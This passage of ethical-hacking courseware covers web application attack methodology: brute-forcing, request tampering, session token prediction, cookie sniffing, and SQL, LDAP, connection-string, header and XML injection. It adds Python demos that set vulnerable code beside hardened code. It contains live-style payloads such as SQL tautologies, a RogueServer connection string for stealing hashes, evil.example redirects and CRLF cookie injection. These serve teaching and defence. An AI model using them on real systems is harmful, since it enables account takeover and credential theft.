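constructed mock login endpoint (added example; all accounts are invented)."""
import itertools
from typing import Callable, Iterable, Iterator, List, Optional, Tuple

# Constructed credential store behind the mock target.
USERS = {"marc": "success", "test": "test", "rini.matthews": "Winter2012", "pin": "42"}

Login = Callable[[str, str], str]


def login_verbose(username: str, password: str) -> str:
    """Vulnerable: the failure message reveals whether the username exists."""
    if username not in USERS:
        return "Username does not exist"
    if USERS[username] != password:
        return "The password provided is incorrect"
    return "Login OK"


def login_generic(username: str, password: str) -> str:
    """Hardened: one message for every failure, so there is no oracle."""
    if USERS.get(username) == password:
        return "Login OK"
    return "Invalid username or password"


def enumerate_users(login: Login, candidates: Iterable[str]) -> List[str]:
    """Keep the candidates whose failure message differs from the message
    returned for a username that certainly does not exist."""
    baseline = login("zz-no-such-user-zz", "x")
    return [u for u in candidates if login(u, "x") != baseline]


def hydra_ns_variants(username: str, wordlist: Iterable[str]) -> Iterator[str]:
    """Attempt order mirroring 'hydra ... -P wordlist -e ns'."""
    yield ""            # -e n: empty password
    yield username      # -e s: password equal to the login name
    yield from wordlist


def guess_password(login: Login, username: str,
                   wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """Return (password, attempts), or (None, attempts) if nothing matched."""
    attempts = 0
    for candidate in hydra_ns_variants(username, wordlist):
        attempts += 1
        if login(username, candidate) == "Login OK":
            return candidate, attempts
    return None, attempts


def keyspace_size(alphabet: str, max_len: int) -> int:
    """Number of candidates of length 1..max_len over the alphabet."""
    return sum(len(alphabet) ** n for n in range(1, max_len + 1))


def brute_force(login: Login, username: str, alphabet: str,
                max_len: int) -> Tuple[Optional[str], int]:
    """Exhaustive search, shortest candidates first. Attempts grow as
    len(alphabet) ** length, which is why this only pays off for short secrets."""
    attempts = 0
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            attempts += 1
            candidate = "".join(chars)
            if login(username, candidate) == "Login OK":
                return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    found = enumerate_users(login_verbose, ["marc", "nobody", "rini.matthews"])
    print("enumerated:", found)
    print("dictionary:", guess_password(login_generic, "marc", ["123456", "letmein", "success"]))
    print("brute force:", brute_force(login_generic, "pin", "0123456789", 2))
    print("8 lowercase letters:", keyspace_size("abcdefghijklmnopqrstuvwxyz", 8), "candidates")
```

Against the generic-message login the enumeration step returns nothing, which is the countermeasure in code; the guessing steps still work because nothing here throttles or locks the account, which is what the real application must add.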
FIGURE 13.42: Burp Suite's Intruder Tool Screenshot (payload processing rules such as "max length" and "to uppercase")
Brutus
Source: http://www.hoobie.net
Brutus is a remote password cracking tool. Brutus supports HTTP, POP3, FTP, SMB, Telnet, IMAP, NNTP, and many other authentication types. It includes a multi-stage authentication engine and can make 60 simultaneous target connections.
FIGURE 13.43: Brutus Tool Screenshot (Brutus AET2, www.hoobie.net/brutus, January 2000; Connection Options and Authentication Options panels)
Session Attacks: Session ID Prediction/Brute Forcing
FIGURE 13.44: Session ID Prediction/Brute Forcing (intercepted WebGoat request with "Referer: http://lanaina:8180/WebGoat/attack?Screen=17&menu=410", "Cookie: JSESSIONID=user01" and "Authorization: Basic Z3Vlc3Q6Z3Vlc3Q" (base64 of guest:guest); the JSESSIONID value is a predictable session cookie)
Attackers can trap cookies using tools such as OWASP Zed Attack Proxy, Burp Suite, etc.
Cookie Exploitation: Cookie Poisoning
OWASP Zed Attack Proxy
Source: https://www.owasp.org
Figure 13.45: OWASP Zed Attack Proxy Tool Screenshot (ZAP 1.x session showing an intercepted GET request to tr.adinterax.com with its User-Agent, Cache-Control, Accept, Referer (http://in.yahoo.com/?p=us), Accept-Encoding, Accept-Language, Accept-Charset and Cookie headers (adxid and adxf cookies), which can be edited before being forwarded; tabs for History, Search, Break Points, Alerts, Active Scan, Spider, Brute Force, Port Scan, Fuzzer, Params and Output)
Web App Hacking Methodology: Authorization Attack
Authorization Attack
- Query String
- Hidden Tags
- Parameter Tampering
- HTTP POST Data
POST data often comprises authorization and session information, since in most applications the information that is provided by the client must be associated
HTTP Request Tampering
Query String Tampering
If the query string is visible in the address bar of the browser, the attacker can easily change the string parameters to bypass authorization mechanisms:
https://juggyshop.com/books/download/852741369.pdf
https://juggybank.com/login/home.jsp?admin=true
Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.
HTTP Headers
If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionalities.
FIGURE 13.46: Query String Tampering
FIGURE 13.47: HTTP Headers
Source: https://www.owasp.org
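The three tampering vectors above (a query string such as admin=true, a hidden POST field, and a forged Referer) all succeed against an authorization check that trusts client-supplied data and all fail against one that takes the role from server-side session state. The following is an added example, not code from the CEH module; the juggybank URL follows the slide, while the session store, the sid cookie name and the role values are constructed assumptions.

```python
"""Request tampering against a client-trusting authorization check versus a
server-side one (added example; session store and cookie name are invented)."""
from dataclasses import dataclass, field
from typing import Callable, Dict, List
from urllib.parse import parse_qs, urlparse

# Constructed server-side session store: session id -> authenticated identity.
SESSIONS: Dict[str, Dict[str, str]] = {
    "s-alice": {"user": "alice", "role": "user"},
    "s-root": {"user": "root", "role": "admin"},
}


@dataclass
class Request:
    url: str
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


def cookies(req: Request) -> Dict[str, str]:
    """Parse the Cookie header into a dict."""
    header = req.headers.get("Cookie", "")
    return dict(p.strip().split("=", 1) for p in header.split(";") if "=" in p)


def vulnerable_is_admin(req: Request) -> bool:
    """Every signal consulted here is under the client's control."""
    query = parse_qs(urlparse(req.url).query)
    if query.get("admin", ["false"])[0] == "true":       # ?admin=true
        return True
    if req.form.get("role") == "admin":                  # hidden form field
        return True
    referer = req.headers.get("Referer", "")             # Referer as proof
    return referer.startswith("https://juggybank.com/admin/")


def hardened_is_admin(req: Request) -> bool:
    """Only the server-side session record decides; the URL, body and
    Referer are never consulted for authorization."""
    session = SESSIONS.get(cookies(req).get("sid", ""))
    return session is not None and session["role"] == "admin"


def tampered_requests(sid: str) -> List[Request]:
    """The three request forms an attacker holding session `sid` submits."""
    base_headers = {"Cookie": f"sid={sid}"}
    return [
        Request("https://juggybank.com/login/home.jsp?admin=true", dict(base_headers)),
        Request("https://juggybank.com/login/home.jsp", dict(base_headers), {"role": "admin"}),
        Request("https://juggybank.com/login/home.jsp",
                {**base_headers, "Referer": "https://juggybank.com/admin/index.jsp"}),
    ]


def count_bypasses(check: Callable[[Request], bool], sid: str = "s-alice") -> int:
    """How many tampered requests the check wrongly accepts for a plain user."""
    return sum(check(r) for r in tampered_requests(sid))


if __name__ == "__main__":
    print("vulnerable check bypassed:", count_bypasses(vulnerable_is_admin), "of 3")
    print("hardened check bypassed:", count_bypasses(hardened_is_admin), "of 3")
```

The same rule applies to the direct-object example (the PDF download URL): the file identifier from the URL must be checked against the ownership recorded on the server, never accepted because it was present in the request.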
Web App Hacking Methodology: Attack Session Management Mechanism
Session Management Attack
- Session Token Prediction
- Session Token Tampering
- Session Hijacking
- Session Replay
- Man-in-the-Middle Attack
Session Token Prediction
Attackers collect a sample of valid session tokens and analyze them for encoding (hex-encoding, Base64) or any pattern. Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine a valid session token.
Attacking Session Token Generation Mechanism
Weak Encoding Example
https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30
When the session token is only the hex (percent) encoding of the ASCII string user=jason;app=admin;date=23/11/2010, the attacker can predict another session token by just changing the date and use it for another transaction with the server.
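The weak encoding example above and the session token prediction attack described before it can both be worked through in code. The following is an added example, not code from the CEH module: it decodes the SessionToken from the slide, forges a token with a different date, infers the next value of a counter-style token (the pattern of the JSESSIONID=user01 cookie in Figure 13.44), and measures character entropy as a crude test of whether a token is worth attacking. The SEQ_TOKENS and RANDOM_TOKENS samples are constructed, not captured traffic.

```python
"""Decode, forge and predict weakly generated session tokens (added example;
the token samples are constructed)."""
import math
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote

SAMPLE_URL = ("https://www.juggyboy.com/checkout?SessionToken="
              "%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
              "%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30")


def decode_token(url: str) -> str:
    """Percent-decode the SessionToken parameter into its ASCII form."""
    return unquote(url.split("SessionToken=", 1)[1].split("&", 1)[0])


def parse_fields(token: str) -> Dict[str, str]:
    """Split 'k=v;k=v' into a dict, preserving field order."""
    return dict(part.split("=", 1) for part in token.split(";") if "=" in part)


def forge_token(fields: Dict[str, str], **changes: str) -> str:
    """Re-encode the fields with some replaced, using the same encoding of
    every character that the original token uses."""
    merged = {**fields, **changes}
    raw = ";".join(f"{k}={v}" for k, v in merged.items())
    return "".join(f"%{ord(c):02X}" for c in raw)


def predict_next(tokens: List[str]) -> Optional[str]:
    """If every observed token is a fixed prefix plus a zero-padded counter
    advancing by a constant step, return the next token; otherwise None."""
    matches = [re.fullmatch(r"(.*?)(\d+)", t) for t in tokens]
    if len(tokens) < 3 or not all(matches):
        return None
    prefixes = {m.group(1) for m in matches}
    widths = {len(m.group(2)) for m in matches}
    if len(prefixes) != 1 or len(widths) != 1:
        return None
    numbers = [int(m.group(2)) for m in matches]
    steps = {b - a for a, b in zip(numbers, numbers[1:])}
    if len(steps) != 1 or steps == {0}:
        return None
    return f"{prefixes.pop()}{numbers[-1] + steps.pop():0{widths.pop()}d}"


def entropy_bits(tokens: List[str]) -> float:
    """Shannon entropy per character over the pooled token characters; a
    16-symbol alphabet used uniformly gives 4.0, a counter far less."""
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


# Constructed samples: a counter-style session cookie, and tokens in which
# every hex digit appears exactly once (a uniform 16-symbol alphabet).
SEQ_TOKENS = ["user01", "user02", "user03", "user04"]
RANDOM_TOKENS = ["3f9a1c7e0b5d8246", "a07e3c5b9d1f6824",
                 "c4b8e2a60f9d1357", "e1d5c9a3b7f02468"]

if __name__ == "__main__":
    plain = decode_token(SAMPLE_URL)
    print("decoded:", plain)
    print("forged:", forge_token(parse_fields(plain), date="24/11/2010"))
    print("next counter token:", predict_next(SEQ_TOKENS))
    print("entropy seq/random:", entropy_bits(SEQ_TOKENS), entropy_bits(RANDOM_TOKENS))
```

Character entropy is only a screening metric: a token made of random-looking hex can still be predictable if it is, say, an MD5 of the current time. It catches the obvious cases, which is what the first pass of a session analysis is for.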
Attacking Session Tokens Handling Mechanism: Session Token Sniffing
Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the Secure flag is not set, the browser also sends them over plain HTTP, so attackers on the network path can capture and replay the cookie to gain unauthorized access to the application.
Wireshark
Source: http://www.wireshark.org
Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.
FIGURE 13.49: Wireshark Tool Screenshot (packet list showing the TCP handshake between 10.0.0.5 and 123.108.40.33, the request "GET /newmail/mailsignout.php HTTP/1.1" and the "HTTP/1.1 200 OK (text/html)" response; the hex pane of the response shows "Server: Apache", "Set-Cookie: n18u=deleted; expires=Thu, 22-Sep-2011 10:22:33 GMT; path=/; domain=.in.com", "Expires: Thu, 19 Nov 1981 08:52:00 GMT" and "Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0")
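Whether a sniffed cookie is replayable is decided by the attributes on its Set-Cookie header, so the check a tester runs on a capture like Figure 13.49 is an audit of those attributes. The following is an added example, not code from the CEH module or from Wireshark. CAPTURED_RESPONSE is constructed to resemble the response in the figure (Apache, the n18u cookie); the PHPSESSID and auth cookies and all values are invented.

```python
"""Audit Set-Cookie headers in a captured HTTP response for the Secure,
HttpOnly and SameSite attributes (added example; the response is constructed)."""
from dataclasses import dataclass, field
from typing import Dict, List

CAPTURED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 22 Sep 2011 10:22:34 GMT\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: n18u=deleted; expires=Thu, 22-Sep-2011 10:22:33 GMT; path=/; domain=.in.com\r\n"
    "Set-Cookie: PHPSESSID=c0n5truct3d5e55i0n; path=/\r\n"
    "Set-Cookie: auth=c0n5truct3dt0k3n; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\n"
    "\r\n"
    "<html><body>signed out</body></html>"
)


@dataclass
class Cookie:
    name: str
    value: str
    # lower-cased attribute name -> value ("" for flags such as Secure)
    attrs: Dict[str, str] = field(default_factory=dict)


def parse_set_cookies(raw_response: str) -> List[Cookie]:
    """Pull every Set-Cookie header out of a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    found: List[Cookie] = []
    for line in head.split("\r\n"):
        if not line.lower().startswith("set-cookie:"):
            continue
        parts = [p.strip() for p in line.split(":", 1)[1].split(";")]
        name, _, value = parts[0].partition("=")
        attrs: Dict[str, str] = {}
        for attr in parts[1:]:
            key, _, val = attr.partition("=")
            attrs[key.strip().lower()] = val.strip()
        found.append(Cookie(name.strip(), value, attrs))
    return found


def audit(raw_response: str) -> Dict[str, List[str]]:
    """Missing protective attributes per cookie, in a fixed order."""
    report: Dict[str, List[str]] = {}
    for c in parse_set_cookies(raw_response):
        issues = []
        if "secure" not in c.attrs:
            issues.append("missing Secure")
        if "httponly" not in c.attrs:
            issues.append("missing HttpOnly")
        if "samesite" not in c.attrs:
            issues.append("missing SameSite")
        report[c.name] = issues
    return report


def replayable_over_http(raw_response: str) -> List[str]:
    """Cookies the browser will also send over plain HTTP, so a sniffer on
    the path can capture and replay them (the case the text describes)."""
    return [c.name for c in parse_set_cookies(raw_response) if "secure" not in c.attrs]


def harden(set_cookie_value: str) -> str:
    """Append Secure and HttpOnly to a Set-Cookie value that lacks them."""
    present = {p.strip().split("=", 1)[0].lower() for p in set_cookie_value.split(";")[1:]}
    out = set_cookie_value.rstrip("; ")
    for flag in ("Secure", "HttpOnly"):
        if flag.lower() not in present:
            out += f"; {flag}"
    return out


if __name__ == "__main__":
    for name, issues in audit(CAPTURED_RESPONSE).items():
        print(f"{name}: {', '.join(issues) or 'ok'}")
    print("replayable over HTTP:", replayable_over_http(CAPTURED_RESPONSE))
```

The Secure attribute only helps if the application is reachable over HTTPS in the first place; a cookie set on a plain-HTTP site is sniffable regardless of its attributes, which is the situation the Wireshark capture above shows.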
Web App Hacking Methodology: Injection Attacks
Injection attacks supply input that is interpreted as part of the interpreted language being used, in order to break the application's normal intended logic.
Web Scripts Injection: If user input is used in code that is dynamically executed, attackers can inject script that the server then runs.
SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database.
OS Commands Injection: Exploit operating systems by entering malicious input where applications utilize user input in a system-level command.
LDAP Injection: Take advantage of non-validated web application input to pass LDAP filters and obtain direct access to databases.
SMTP Injection: Inject arbitrary SMTP commands into the application's mail-sending function to generate large volumes of spam email.
XPath Injection: Enter malicious strings in input fields to alter the XPath query so that it interferes with the application's logic.
Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection.
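Two of the injection classes above are shown here as the vulnerable construction beside the safe one, as an added example that is not code from the CEH module. For SQL, a login query built by string concatenation is bypassed with a tautology and with a comment sequence, while the parameterized version is not (sqlite3 stands in for the server-side database engine). For LDAP, a search filter built from raw input can be widened by the attacker, while the RFC 4515 escaping function neutralizes the metacharacters. The users table, the credentials and the base LDAP filter are constructed.

```python
"""SQL injection and LDAP filter injection, vulnerable versus safe
(added example; the user table and filter are constructed)."""
import sqlite3
from typing import List, Optional


def demo_db() -> sqlite3.Connection:
    """In-memory table standing in for the application's user store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("admin", "c0n5truct3d!", "admin"), ("jason", "s3cret", "user")])
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Concatenation: the input becomes part of the SQL grammar."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Bound parameters are data; quotes inside them never reach the parser."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


def ldap_escape(value: str) -> str:
    """RFC 4515 escaping for a value placed inside an LDAP search filter."""
    out = []
    for ch in value:
        if ch in "\\*()\0":
            out.append(f"\\{ord(ch):02x}")
        else:
            out.append(ch)
    return "".join(out)


def ldap_filter_vulnerable(uid: str) -> str:
    """Raw input: ')' closes the uid clause and the rest rewrites the filter."""
    return f"(&(objectClass=person)(uid={uid}))"


def ldap_filter_safe(uid: str) -> str:
    return f"(&(objectClass=person)(uid={ldap_escape(uid)}))"


def demo() -> List[str]:
    """Run both attacks against both constructions and collect the outcomes."""
    db = demo_db()
    payload = "' OR '1'='1"
    return [
        str(login_vulnerable(db, "admin", payload)),   # tautology logs in as admin
        str(login_safe(db, "admin", payload)),          # None: no row matches
        ldap_filter_vulnerable("*)(uid=*"),
        ldap_filter_safe("*)(uid=*"),
    ]


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The second SQL payload used in the checks, "admin'--", shows why a login routine must never trust the user name field either: the comment sequence removes the password condition entirely.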
Web App Hacking Methodology: Attack Data Connectivity
Database connection strings are used to connect applications to database engines. Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries.
Example of a common connection string used to connect to a Microsoft SQL Server database:
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"
Data Connectivity Attacks
- Connection String Injection
- Connection String Parameter Pollution (CSPP) Attacks
- Connection Pool DoS
Connection String Injection
In a delegated authentication environment, the attacker injects parameters into a connection string by appending them with the semicolon (;) character.
A connection string injection attack can occur when dynamic string concatenation is used to build connection strings based on user input.
Before Injection
After Injection
When the connection string is populated, the injected Encryption value will be added to the previously configured set of parameters.
Connection String Injection
A connection string injection attack can occur when dynamic string concatenation is used to build connection strings that are based on user input. If the string is not validated and malicious text or characters are not escaped, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional value. The connection string is parsed using a "last one wins" algorithm, so the hostile input is substituted for the legitimate value of the same parameter.
Before injection
FIGURE 13.50: Before injection
After injection
FIGURE 13.51: After injection
Connection String Parameter Pollution (CSPP) Attacks
Hash Stealing
The attacker repeats the Data Source parameter pointing at a rogue server and forces Integrated Security, so the application authenticates to the attacker's server with the Windows credentials of the account it runs as:
Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=RogueServer; Password=; Integrated Security=true;
Port Scanning
The attacker tries to connect to different ports by changing the value and observing the error messages obtained:
Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target Server, Target Port=443; Password=; Integrated Security=true;
Hijacking Web Credentials
Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target Server, Target Port; Password=; Integrated Security=true;
Connection Pool DoS
Attackers run many long-running database queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users.
Example:
By default in ASP.NET, the maximum allowed connections in the pool is 100 and the timeout is 30 seconds; keeping all 100 connections busy for longer than the timeout means that no one else would be able to use the database-related parts of the application.
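The "last one wins" rule and the CSPP strings above are easiest to understand with a parser that applies the rule, beside a builder that quotes user-supplied values so that a semicolon inside them cannot start a new parameter (the approach taken by .NET's SqlConnectionStringBuilder). The following is an added example, not code from the CEH module or from any database driver; the server names, the user ID and the malicious password input are constructed.

```python
"""Connection string parsing with 'last one wins', detection of duplicated
keys (parameter pollution), and a quoting builder (added example)."""
from typing import Dict, List, Set, Tuple


def split_pairs(cs: str) -> List[Tuple[str, str]]:
    """Split a connection string into (key, value) pairs in order. Keys are
    case-insensitive; a value may be quoted with ' or " so that ';' inside
    it is literal."""
    pairs: List[Tuple[str, str]] = []
    i, n = 0, len(cs)
    while i < n:
        while i < n and cs[i] in "; ":        # skip empty segments
            i += 1
        eq = cs.find("=", i)
        if eq == -1:
            break
        key = cs[i:eq].strip().lower()
        i = eq + 1
        while i < n and cs[i] == " ":
            i += 1
        if i < n and cs[i] in "'\"":
            end = cs.find(cs[i], i + 1)
            if end == -1:
                raise ValueError("unterminated quoted value")
            value = cs[i + 1:end]
            nxt = cs.find(";", end)
            i = n if nxt == -1 else nxt + 1
        else:
            end = cs.find(";", i)
            end = n if end == -1 else end
            value = cs[i:end].strip()
            i = end + 1
        if key:
            pairs.append((key, value))
    return pairs


def parse_connection_string(cs: str) -> Dict[str, str]:
    """Resolve duplicates the way the providers do: the last value wins."""
    return dict(split_pairs(cs))


def duplicate_keys(cs: str) -> Set[str]:
    """Keys that appear more than once: the signature of parameter pollution."""
    keys = [k for k, _ in split_pairs(cs)]
    return {k for k in keys if keys.count(k) > 1}


def quote_value(value: str) -> str:
    """Quote a value when it contains ';' or quote characters or edge spaces."""
    if not any(c in value for c in ";'\"") and value == value.strip():
        return value
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    raise ValueError("value contains both quote characters")


def build_vulnerable(password: str) -> str:
    """Concatenation: whatever the user typed is parsed as parameters."""
    return f"Data Source=SQL2005;Initial Catalog=db1;User ID=app;Password={password};"


def build_safe(password: str) -> str:
    """Each value is quoted when it needs to be, so it stays one value."""
    params = {"Data Source": "SQL2005", "Initial Catalog": "db1",
              "User ID": "app", "Password": password}
    return ";".join(f"{k}={quote_value(v)}" for k, v in params.items())


# The hash-stealing string from the slide.
HASH_STEALING = ("Data source=SQL2005; initial catalog=db1; integrated security=no; "
                 "user ID=;Data Source=RogueServer; Password=; Integrated Security=true;")

if __name__ == "__main__":
    print("resolves to:", parse_connection_string(HASH_STEALING))
    print("polluted keys:", duplicate_keys(HASH_STEALING))
    evil = "x;Data Source=RogueServer;Integrated Security=true"
    print("vulnerable:", parse_connection_string(build_vulnerable(evil))["data source"])
    print("safe:", parse_connection_string(build_safe(evil))["data source"])
```

duplicate_keys() is also a usable detection rule: a connection string that the application assembled at runtime should never contain the same key twice, so logging that condition catches CSPP attempts before the connection is opened.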
Web App Hacking Methodology: Attack Web App Client
Attackers interact with the server-side applications in unexpected ways in order to perform malicious actions against the end users and access unauthorized data.
Attack Web App Client
- Redirection Attacks
- HTTP Header Injection
- Frame Injection
- Request Forgery Attacks
- Session Fixation
- Privacy Attacks
- ActiveX Attacks
Redirection Attacks
Attackers develop code and links in such a way that they resemble the main site that the user wants to visit; however, when the user tries to visit the respective site, the user is redirected to the malicious website, where there is a possibility for the attacker to obtain the user's credentials and other sensitive information.
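The first two client-side attacks in the list above, redirection and HTTP header injection, come down to the server copying a request value into a response without checking it. The following is an added example, not code from the CEH module: an open redirect and a header-injection sink, each beside a validated version, exercised with the payload forms an attacker sends. The site host name, the "next" parameter and the sample payloads are constructed assumptions.

```python
"""Open redirect and HTTP header injection, vulnerable versus validated
(added example; host name and payloads are constructed)."""
from typing import List, Optional
from urllib.parse import urlparse

SITE_HOST = "juggybank.com"


def redirect_unchecked(next_url: str) -> str:
    """Open redirect: the Location header is taken straight from the request."""
    return next_url


def safe_redirect_target(next_url: str) -> Optional[str]:
    """Accept only a same-site absolute path; everything else yields None
    (the caller then sends the user to the home page instead)."""
    parsed = urlparse(next_url)
    if parsed.scheme or parsed.netloc:            # absolute URL, //host, javascript:
        return None
    if not parsed.path.startswith("/") or parsed.path.startswith("//"):
        return None
    if "\\" in next_url or any(c in next_url for c in "\r\n"):
        return None
    return next_url


def set_header_unchecked(headers: List[str], name: str, value: str) -> List[str]:
    """Header injection: a CR/LF inside the value ends the header line, and
    the remainder is parsed by the client as further headers (or a body)."""
    headers.append(f"{name}: {value}")
    return "\r\n".join(headers).split("\r\n")     # as a client would see them


def set_header_safe(headers: List[str], name: str, value: str) -> List[str]:
    """Reject control characters before they reach the response."""
    if any(c in value for c in "\r\n\0"):
        raise ValueError("CR/LF in header value")
    headers.append(f"{name}: {value}")
    return list(headers)


# Constructed payloads an attacker places in the "next" parameter.
OPEN_REDIRECT_PAYLOADS = [
    "https://evil.example/login",     # plain external site
    "//evil.example/login",           # protocol-relative, resolves off-site
    "/\\evil.example",                # some browsers treat \ as /
    "javascript:alert(1)",
]


def count_open_redirects(check) -> int:
    """How many payloads the given function would forward the user to."""
    return sum(1 for p in OPEN_REDIRECT_PAYLOADS
               if check(p) is not None and check(p) != "/")


if __name__ == "__main__":
    print("unchecked redirect follows", count_open_redirects(redirect_unchecked), "payloads")
    print("validated redirect follows", count_open_redirects(safe_redirect_target), "payloads")
    injected = "home\r\nSet-Cookie: sid=attacker"
    print(set_header_unchecked(["HTTP/1.1 302 Found"], "Location", injected))
```

The header-injection payload plants a Set-Cookie line, which is how header injection turns into session fixation: the victim's browser stores the attacker's session identifier. Modern frameworks reject CR/LF in header values for exactly this reason; the check in set_header_safe() is what they do internally.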
W e b A p p H a c k in g M e t h o d o lo g y
A tta c k W e b S e r v ic e s
AttackWebServices CEH
Attack Web Services
- SOAP Injection
- XML Injection
- WSDL Probing Attacks
- Information Leakage
- Database Attacks
- DoS Attacks
FIGURE 13.52: Attack Web Services
Web Services Probing Attacks
- These attacks work similarly to SQL injection attacks.
- Attacker uses these requests to include malicious contents in SOAP requests and analyzes errors to gain a deeper understanding of potential security weaknesses.
Web Services Probing Attacks
In the first step, the attacker traps the WSDL document from web service traffic and analyzes it to determine the purpose of the application, its functional breakdown, entry points, and message types. These attacks work similarly to SQL injection attacks. The attacker then creates a set of valid requests by selecting a set of operations and formulating the request messages according to the rules of the XML schema, so that they can be submitted to the web service. The attacker uses these requests to include malicious content in SOAP requests and analyzes the resulting errors to gain a deeper understanding of potential security weaknesses.
FIGURE 13.53: Web Services Probing Attacks
Web Service Attacks: SOAP Injection
Attacker injects malicious query strings in the user input field to bypass web services.
FIGURE 13.54: SOAP Injection (screenshot of a request to http://juggyboy.com/ws/products.asmx and the server response)
Figure: XML Injection (screenshot of http://juggyboy.com/ws/login.asmx showing the server-side users XML store and an injected input that creates a new <user> entry on the server with username jason, password attack, userid 105 and mail jason@juggyboy.com)
Web Service Attacks: XML Injection
The process in which the attacker enters values that query XML with values that take advantage of exploits is known as an XML injection attack. Attackers inject XML data and tags into user input fields to manipulate the XML schema or populate the XML database with bogus entries. XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.
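Added example (not from the module): the <user> record from the slide built by string concatenation and by entity escaping, then parsed back to show how many accounts the store ends up with. The element names and the stand-in injection string are assumptions taken from the slide figure.

```python
"""Added example (not from the CEH module): the <user> record from the XML
injection slide built two ways, then parsed back. Element names and the
stand-in injection string are assumptions taken from the slide figure."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def build_user_unsafe(username, password, userid, mail):
    """Vulnerable pattern: values are concatenated into the markup, so any
    '<' or '>' the caller supplies is parsed as XML structure."""
    return (f"<user><username>{username}</username>"
            f"<password>{password}</password>"
            f"<userid>{userid}</userid><mail>{mail}</mail></user>")


def build_user_safe(username, password, userid, mail):
    """Hardened form: text values are entity-escaped and userid is forced to
    an integer, so supplied data can never open or close an element."""
    return (f"<user><username>{escape(username)}</username>"
            f"<password>{escape(password)}</password>"
            f"<userid>{int(userid)}</userid>"
            f"<mail>{escape(mail)}</mail></user>")


def store_users(*fragments):
    """Wrap the fragments in the <users> root the server-side store uses."""
    return "<users>" + "".join(fragments) + "</users>"


def user_ids(users_xml):
    """Parse the store and return the userid of every <user> it now holds."""
    root = ET.fromstring(users_xml)
    return [u.findtext("userid") for u in root.findall("user")]


# Constructed attacker input for the mail field: it closes the current record
# and appends a second one with an attacker-chosen userid.
INJECTED_MAIL = ("jason@juggyboy.com</mail></user>"
                 "<user><username>evil</username><password>x</password>"
                 "<userid>1</userid><mail>evil@example.com")


if __name__ == "__main__":
    unsafe = store_users(build_user_unsafe("jason", "attack", 105, INJECTED_MAIL))
    safe = store_users(build_user_safe("jason", "attack", 105, INJECTED_MAIL))
    print(user_ids(unsafe))   # ['105', '1']: a second account was created
    print(user_ids(safe))     # ['105']: the injection stays inert text
```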
Web Services Parsing Attacks
…parser to create a denial-of-service attack or generate logical errors in web service request processing.
Recursive Payloads: Attacker queries for web services with a grammatically correct SOAP document that contains infinite processing loops, resulting in exhaustion of XML parser and CPU resources.
Oversize Payloads: Attackers send a payload that is excessively large to consume all system resources, rendering web services inaccessible to other legitimate users.
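Added example (not from the module): a receiving-side guard, in Python, that rejects oversize and recursive SOAP payloads before the parser has finished with them; the byte and depth ceilings are constructed values.

```python
"""Added example (not from the CEH module): a receive-side guard against the
recursive and oversize payloads described above. The byte and depth ceilings
are constructed values; size them to your own schema."""
import io
import xml.etree.ElementTree as ET

MAX_BYTES = 64 * 1024   # constructed ceiling for a whole SOAP request
MAX_DEPTH = 32          # constructed ceiling for element nesting

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


class PayloadRejected(ValueError):
    """Raised as soon as a ceiling is crossed, before the rest is parsed."""

    def __init__(self, reason, detail):
        super().__init__(f"{reason}: {detail}")
        self.reason = reason


def parse_soap_guarded(data, max_bytes=MAX_BYTES, max_depth=MAX_DEPTH):
    """Parse a SOAP envelope with a size ceiling (oversize payloads) and a
    nesting ceiling (recursive payloads). iterparse emits start/end events
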